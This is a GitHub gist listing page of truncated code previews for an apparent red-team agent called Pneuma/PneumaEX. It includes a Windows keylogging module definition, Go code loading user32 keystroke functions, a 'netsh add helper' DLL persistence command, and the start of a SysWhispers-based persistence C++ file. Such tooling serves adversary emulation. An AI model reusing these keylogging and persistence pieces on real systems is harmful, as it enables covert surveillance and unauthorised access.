khyberspache
/ main.go
Created
January 19, 2021 15:08
Example main.go for pneuma to compile into a shared library with an exported function on Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //+build cgo | |
| package main | |
| import "C" | |
| import ( | |
| "flag" | |
| "github.com/preludeorg/pneuma/sockets" | |
| "github.com/preludeorg/pneuma/util" | |
| "log" |
khyberspache
/ commands_windows.go
Created
January 19, 2021 15:00
Define commands build for Windows platforms
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package commands | |
| import ( | |
| "encoding/json" | |
| "log" | |
| "os" | |
| "syscall" | |
| "unsafe" | |
| ) |
khyberspache
/ commands_other.go
Created
January 19, 2021 14:59
Define build for non-windows platforms
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //+build !windows | |
| package commands | |
| func CallNativeAPI(task string) (string, int, int) { | |
| return "Not implemented for non-Windows platforms", 1, -1 | |
| } |
khyberspache
/ commands.go
Last active
January 19, 2021 14:58
Pneuma commands file for an internal API task
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if executor == "keyword" { | |
| task := splitMessage(message, '.') | |
| if task[0] == "api" { | |
| return CallNativeAPI(task[1]) | |
| } else if task[0] == "config" { | |
| return updateConfiguration(task[1], agent) | |
| } | |
| return "Keyword selected not available for agent", 0, 0 | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if executor == "keyword" { | |
| task := splitMessage(message, '.') | |
| if task[0] == "module" { | |
| var err error | |
| if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) { | |
| err = util.InstallModule(task[1], payloadPath) | |
| } | |
| if err != nil { | |
| return err.Error(), 1, -1 | |
| } |
khyberspache
/ pneumaEXModule.yml
Created
January 19, 2021 14:49
PneumaEX module for keylogging on Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| platforms: | |
| windows: | |
| keyword: | |
| command: module.collect.keyLogger | |
| payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe" |
khyberspache
/ loadingWinDLL.go
Created
January 19, 2021 14:47
Example of loading windows DLL and Procs for keylogging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var ( | |
| user32 = syscall.NewLazyDLL("user32.dll") | |
| getAsyncKeyState = user32.NewProc("GetAsyncKeyState") | |
| getKeyboardLayout = user32.NewProc("GetKeyboardLayout") | |
| getKeyState = user32.NewProc("GetKeyState") | |
| toUnicodeEx = user32.NewProc("ToUnicodeEx") | |
| ) |
khyberspache
/ netsh_helper_dll.yml
Created
January 19, 2021 14:44
Example command for using Helper DLL persistence
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| platforms: | |
| windows: | |
| exec: | |
| command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
| payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' | |
| cmd: | |
| command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
| payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' |
khyberspache
/ whisperNetshHelperPersist.cpp
Created
January 19, 2021 14:41
Use SysWhispers with NetSh DLL helper persistence to spawn processes at a given registry key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <locale> | |
| #include <cstdlib> | |
| #include <stdio.h> | |
| #include <string> | |
| #include <Windows.h> | |
| #include "Syscalls.h" | |
| LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&); | |
| DWORD WINAPI RunBin(LPVOID lpParameter) { |
khyberspache
/ standalone_func.go
Created
December 23, 2020 22:12
Standalone function call example for PneumaEX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RunStandalone("GoCapture", "C:\File\Path\To\Capture\into.tmp") |